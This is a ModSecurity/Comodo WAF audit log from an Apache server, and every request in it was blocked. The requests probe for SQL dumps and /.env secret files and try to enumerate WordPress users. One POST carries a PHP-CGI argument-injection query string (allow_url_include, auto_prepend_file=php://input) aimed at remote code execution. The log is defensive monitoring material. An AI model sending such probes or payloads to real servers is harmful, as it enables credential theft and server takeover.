Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb737304-Z-- --0abf6f5a-A-- [14/Apr/2025:23:00:00 +0700] Z_0xANPxEtam20ggC7hGlAAAAJE 103.236.140.4 44554 103.236.140.4 8181 --0abf6f5a-B-- GET /wp_new.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.66.35.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.66.35.20 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --0abf6f5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0abf6f5a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646400018882 1569 (- - -) Stopwatch2: 1744646400018882 1569; combined=612, p1=304, p2=281, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0abf6f5a-Z-- --390e351a-A-- [14/Apr/2025:23:00:00 +0700] Z_0xANga3eJwvi_gLpJBEwAAAEc 103.236.140.4 44556 103.236.140.4 8181 --390e351a-B-- GET /migration.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.66.35.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.66.35.20 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --390e351a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --390e351a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646400889952 14181 (- - -) Stopwatch2: 1744646400889952 14181; combined=25111, p1=346, p2=375, p3=0, p4=0, p5=12208, sr=65, sw=0, l=0, gc=12182 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --390e351a-Z-- --b6b8694d-A-- [14/Apr/2025:23:00:01 +0700] Z_0xAdPxEtam20ggC7hGlQAAAJA 103.236.140.4 44558 103.236.140.4 8181 --b6b8694d-B-- GET /archief.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.66.35.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.66.35.20 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --b6b8694d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6b8694d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646401764976 2280 (- - -) Stopwatch2: 1744646401764976 2280; combined=823, p1=408, p2=386, p3=0, p4=0, p5=29, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6b8694d-Z-- --22f69456-A-- [14/Apr/2025:23:00:02 +0700] Z_0xAtPxEtam20ggC7hGlgAAAJI 103.236.140.4 44560 103.236.140.4 8181 --22f69456-B-- GET /adminer.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.66.35.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.66.35.20 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --22f69456-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22f69456-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646402627443 2457 (- - -) Stopwatch2: 1744646402627443 2457; combined=903, p1=423, p2=449, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22f69456-Z-- --6d59c20a-A-- [14/Apr/2025:23:00:03 +0700] Z_0xA4gxSXM4jtK9zHGOpgAAAMo 103.236.140.4 44562 103.236.140.4 8181 --6d59c20a-B-- GET /phpmyadmin.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.66.35.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.66.35.20 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --6d59c20a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d59c20a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646403469814 2440 (- - -) Stopwatch2: 1744646403469814 2440; combined=857, p1=433, p2=395, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d59c20a-Z-- --b6921b7d-A-- [14/Apr/2025:23:00:05 +0700] Z_0xBdga3eJwvi_gLpJBFAAAAEQ 103.236.140.4 44564 103.236.140.4 8181 --b6921b7d-B-- GET /myadmin.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 179.43.159.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 179.43.159.195 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1 Accept: */* --b6921b7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6921b7d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744646405031944 2924 (- - -) Stopwatch2: 1744646405031944 2924; combined=1010, p1=491, p2=487, p3=0, p4=0, p5=32, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6921b7d-Z-- --be815665-A-- [15/Apr/2025:00:10:08 +0700] Z_1BcNPxEtam20ggC7hGqwAAAIU 103.236.140.4 44978 103.236.140.4 8181 --be815665-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 159.89.174.87 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 159.89.174.87 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --be815665-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be815665-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744650608655985 522 (- - -) Stopwatch2: 1744650608655985 522; combined=179, p1=160, p2=0, p3=0, p4=0, p5=19, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be815665-Z-- --b148e62d-A-- [15/Apr/2025:00:45:58 +0700] Z_1J1tPxEtam20ggC7hGuQAAAI0 103.236.140.4 45230 103.236.140.4 8181 --b148e62d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 154.193.155.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.193.155.185 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b148e62d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b148e62d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744652758094994 3051 (- - -) Stopwatch2: 1744652758094994 3051; combined=1309, p1=439, p2=842, p3=0, p4=0, p5=28, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b148e62d-Z-- --1b896d55-A-- [15/Apr/2025:01:08:38 +0700] Z_1PJlpzfFgMsbYwm2Kh5wAAAA0 103.236.140.4 45954 103.236.140.4 8181 --1b896d55-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; GM1917) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --1b896d55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b896d55-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744654118055320 874 (- - -) Stopwatch2: 1744654118055320 874; combined=381, p1=348, p2=0, p3=0, p4=0, p5=32, sr=150, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b896d55-Z-- --46b04a25-A-- [15/Apr/2025:01:35:04 +0700] Z_1VWNga3eJwvi_gLpJC2wAAAEg 103.236.140.4 52190 103.236.140.4 8181 --46b04a25-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 146.190.103.103 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 146.190.103.103 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --46b04a25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46b04a25-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744655704906079 696 (- - -) Stopwatch2: 1744655704906079 696; combined=279, p1=244, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46b04a25-Z-- --b7839631-A-- [15/Apr/2025:01:56:24 +0700] Z_1aWIgxSXM4jtK9zHGP8wAAAMU 103.236.140.4 52294 103.236.140.4 8181 --b7839631-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 196.251.67.143 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 196.251.67.143 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --b7839631-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7839631-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744656984835492 898 (- - -) Stopwatch2: 1744656984835492 898; combined=353, p1=303, p2=0, p3=0, p4=0, p5=50, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7839631-Z-- --ed40f47e-A-- [15/Apr/2025:02:15:07 +0700] Z_1eu9PxEtam20ggC7hIXwAAAIY 103.236.140.4 52922 103.236.140.4 8181 --ed40f47e-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.99.181.249 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.99.181.249 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ed40f47e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed40f47e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744658107477332 848 (- - -) Stopwatch2: 1744658107477332 848; combined=314, p1=277, p2=0, p3=0, p4=0, p5=36, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed40f47e-Z-- --14c65c76-A-- [15/Apr/2025:02:30:24 +0700] Z_1iUFpzfFgMsbYwm2KkWwAAABg 103.236.140.4 53088 103.236.140.4 8181 --14c65c76-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 64.227.70.2 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --14c65c76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14c65c76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744659024337885 860 (- - -) Stopwatch2: 1744659024337885 860; combined=331, p1=290, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14c65c76-Z-- --a098d354-A-- [15/Apr/2025:02:41:56 +0700] Z_1lBFpzfFgMsbYwm2KkZgAAABU 103.236.140.4 53164 103.236.140.4 8181 --a098d354-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.168 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.72 Accept-Charset: utf-8 --a098d354-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a098d354-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744659716960278 859 (- - -) Stopwatch2: 1744659716960278 859; combined=336, p1=300, p2=0, p3=0, p4=0, p5=36, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a098d354-Z-- --4c983a1c-A-- [15/Apr/2025:04:51:42 +0700] Z_2Dbs-f7AifS1fst95zEwAAAAI 103.236.140.4 60158 103.236.140.4 8181 --4c983a1c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.227.217.111 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.227.217.111 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --4c983a1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c983a1c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744667502397526 773 (- - -) Stopwatch2: 1744667502397526 773; combined=301, p1=269, p2=0, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c983a1c-Z-- --3925c57e-A-- [15/Apr/2025:05:24:11 +0700] Z_2LC8-f7AifS1fst95zGgAAABE 103.236.140.4 60218 103.236.140.4 8181 --3925c57e-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.141.38 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.141.38 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.25.1 Accept: */* Content-Type: application/x-www-form-urlencoded --3925c57e-C-- --3925c57e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3925c57e-E-- --3925c57e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744669451610642 4516 (- - -) Stopwatch2: 1744669451610642 4516; combined=2760, p1=504, p2=2226, p3=0, p4=0, p5=30, sr=84, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3925c57e-Z-- --1c053c2d-A-- [15/Apr/2025:05:54:50 +0700] Z_2SOs-f7AifS1fst95zHwAAAAE 103.236.140.4 60286 103.236.140.4 8181 --1c053c2d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: SuperBot/4.4.0.60 (Windows XP) Accept-Charset: utf-8 --1c053c2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c053c2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744671290049886 837 (- - -) Stopwatch2: 1744671290049886 837; combined=334, p1=296, p2=0, p3=0, p4=0, p5=38, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c053c2d-Z-- --71d5fe23-A-- [15/Apr/2025:07:13:15 +0700] Z_2km6XLWI2MDahumW9riQAAANc 103.236.140.4 60524 103.236.140.4 8181 --71d5fe23-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.168 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; CLT-L29 Build/HUAWEICLT-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 OPR/48.1.2331.132804 Accept-Charset: utf-8 --71d5fe23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71d5fe23-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744675995569601 905 (- - -) Stopwatch2: 1744675995569601 905; combined=351, p1=308, p2=0, p3=0, p4=0, p5=43, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
